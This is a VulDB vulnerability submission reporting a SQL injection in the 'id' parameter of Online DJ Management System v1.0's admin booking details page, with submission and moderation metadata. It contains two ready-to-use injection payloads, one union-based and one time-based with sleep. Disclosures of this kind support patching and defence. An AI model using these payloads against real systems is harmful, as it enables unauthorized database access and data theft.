제출 #150969: Online DJ Management System v1.0 /odjms/admin/bookings/view_details.php GET parameter id exists SQL injection vulnerability정보

제목Online DJ Management System v1.0 /odjms/admin/bookings/view_details.php GET parameter id exists SQL injection vulnerability
설명An issue was discovered in Online DJ Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /odjms/admin/bookings/view_details.php?id. Payload1:id=-1) union all select null,concat(0x717273,0x5556575859),null,null,null,null,null,null,null,null,null,null,null,null,null-- - Payload2:id=1) and (select 2 from (select(sleep(10)))x) and (3=3
원천⚠️ https://github.com/ShellHunTerAndyLABA/bug_report/blob/main/SQLi-1.md
사용자
 Andy_LB (UID 45991)
제출2023. 05. 01. AM 11:50 (3 연령 ago)
모더레이션2023. 05. 01. PM 05:45 (6 hours later)
상태수락
VulDB 항목227795 [SourceCodester Online DJ Management System 1.0 GET Parameter view_details.php 아이디 SQL 주입]
포인트들20

이전개요다음

Interested in the pricing of exploits?

See the underground prices here!